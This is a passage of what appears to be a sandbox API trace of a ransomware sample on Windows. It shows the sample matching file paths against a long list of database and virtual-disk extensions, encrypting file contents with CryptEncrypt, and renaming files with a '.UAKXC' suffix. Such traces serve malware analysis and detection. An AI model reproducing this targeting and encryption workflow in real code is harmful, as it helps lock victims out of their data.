(lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".p97") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".pan") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".pdb") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".pdm") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".pnz") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".qry") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".qvd") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rbf") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rctd") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rod") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rodx") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rpd") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".rsd") returned 0x0 [0136.992] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sas7bdat") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sbf") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".scx") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sdb") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sdc") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sdf") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sis") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".spq") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sql") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sqlite") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sqlite3") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".sqlitedb") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".te") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".temx") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".tmd") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".tps") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".trc") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".trm") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".udb") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".udl") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".usr") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".v12") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vis") returned 0x0 [0136.993] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vpd") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vvv") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".wdb") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".wmdb") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".wrk") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".xdb") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".xld") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".xmlff") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".abcddb") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".abs") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".abx") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".accdw") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".adn") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".db2") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".fm5") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".hjt") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".icg") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".icr") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".kdb") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".lut") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".maw") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mdn") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".mdt") returned 0x0 [0136.994] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vdi") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vhd") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmdk") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".pvm") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmem") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmsn") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmsd") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".nvram") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmx") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".raw") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".qcow2") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".subvol") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".bin") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vsv") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".avhd") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmrs") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vhdx") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".avdx") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".vmcx") returned 0x0 [0136.995] StrStrIW (lpFirst="C:\\Program Files (x86)\\desktop.ini", lpSrch=".iso") returned 0x0 [0136.995] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.996] WriteFile (in: hFile=0x2ac, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0136.997] WriteFile (in: hFile=0x2ac, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0136.997] SetEndOfFile (hFile=0x2ac) returned 1 [0136.997] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.997] ReadFile (in: hFile=0x2ac, lpBuffer=0x5030000, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0xae, lpOverlapped=0x0) returned 1 [0136.997] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.997] WriteFile (in: hFile=0x2ac, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0xae, lpOverlapped=0x0) returned 1 [0136.997] CloseHandle (hObject=0x2ac) returned 1 [0136.998] GetProcessHeap () returned 0xea0000 [0136.998] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xee6e88 [0136.998] lstrcpyW (in: lpString1=0xee6e88, lpString2="C:\\Program Files (x86)\\desktop.ini" | out: lpString1="C:\\Program Files (x86)\\desktop.ini") returned="C:\\Program Files (x86)\\desktop.ini" [0136.999] lstrcatW (in: lpString1="C:\\Program Files (x86)\\desktop.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\desktop.ini.UAKXC") returned="C:\\Program Files (x86)\\desktop.ini.UAKXC" [0136.999] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), lpNewFileName="C:\\Program Files (x86)\\desktop.ini.UAKXC" (normalized: "c:\\program files (x86)\\desktop.ini.uakxc")) returned 1 [0137.024] GetProcessHeap () returned 0xea0000 [0137.024] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e88 | out: hHeap=0xea0000) returned 1 [0137.024] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c08 | out: hHeap=0xea0000) returned 1 [0137.024] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b50 | out: hHeap=0xea0000) returned 1 [0137.024] Sleep (dwMilliseconds=0x1f4) [0137.534] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0137.534] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0137.534] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0137.535] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf")) returned 0x20 [0137.543] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\bod_r.TTF" (normalized: "c:\\program files\\dvd maker\\bod_r.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.543] GetLastError () returned 0x5 [0137.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0137.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3058 | out: hHeap=0xea0000) returned 1 [0137.544] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0137.544] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0137.544] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0137.544] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax")) returned 0x20 [0137.545] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.545] GetLastError () returned 0x5 [0137.545] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee558 | out: hHeap=0xea0000) returned 1 [0137.545] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0137.545] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0137.545] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0137.545] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0137.546] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf")) returned 0x20 [0137.546] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.546] GetLastError () returned 0x5 [0137.546] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec31e0 | out: hHeap=0xea0000) returned 1 [0137.546] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd88 | out: hHeap=0xea0000) returned 1 [0137.546] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0137.546] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0137.546] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0137.547] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax")) returned 0x20 [0137.547] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\soniccolorconverter.ax" (normalized: "c:\\program files\\dvd maker\\soniccolorconverter.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.547] GetLastError () returned 0x5 [0137.547] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee638 | out: hHeap=0xea0000) returned 1 [0137.547] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecdd8 | out: hHeap=0xea0000) returned 1 [0137.547] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0137.547] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0137.547] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0137.548] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax")) returned 0x20 [0137.548] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.548] GetLastError () returned 0x5 [0137.548] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee5c0 | out: hHeap=0xea0000) returned 1 [0137.548] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeece00 | out: hHeap=0xea0000) returned 1 [0137.548] Sleep (dwMilliseconds=0x1f4) [0138.060] Sleep (dwMilliseconds=0x1f4) [0139.450] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0139.450] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0139.451] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0139.452] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc")) returned 0x20 [0139.452] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files (x86)\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0139.452] GetLastError () returned 0x5 [0139.452] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd768 | out: hHeap=0xea0000) returned 1 [0139.453] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecc70 | out: hHeap=0xea0000) returned 1 [0139.453] Sleep (dwMilliseconds=0x1f4) [0139.975] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0139.975] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0139.975] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0139.976] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files")) returned 0x20 [0139.977] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0139.977] GetLastError () returned 0x0 [0139.977] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=36667) returned 1 [0139.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".4dd") returned 0x0 [0139.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".4dl") returned 0x0 [0139.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accdb") returned 0x0 [0139.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accdc") returned 0x0 [0139.977] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accde") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accdr") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accdt") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accft") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".adb") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ade") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".adf") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".adp") returned 0x0 [0139.978] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".arc") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ora") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".alf") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ask") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".btr") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".bdf") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".cat") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".cdb") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ckp") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".cma") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".cpd") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dacpac") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dad") returned 0x0 [0139.979] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dadiagrams") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".daschema") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".db") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".db-shm") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".db-wal") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".db3") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbc") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbf") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbs") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbt") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbv") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dbx") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dcb") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dct") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dcx") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ddl") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dlis") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dp1") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dqy") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dsk") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dsn") returned 0x0 [0139.980] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dtsx") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".dxl") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".eco") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ecx") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".edb") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".epim") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".exb") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fcd") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fdb") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fic") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fmp") returned 0x0 [0139.981] StrStrIW 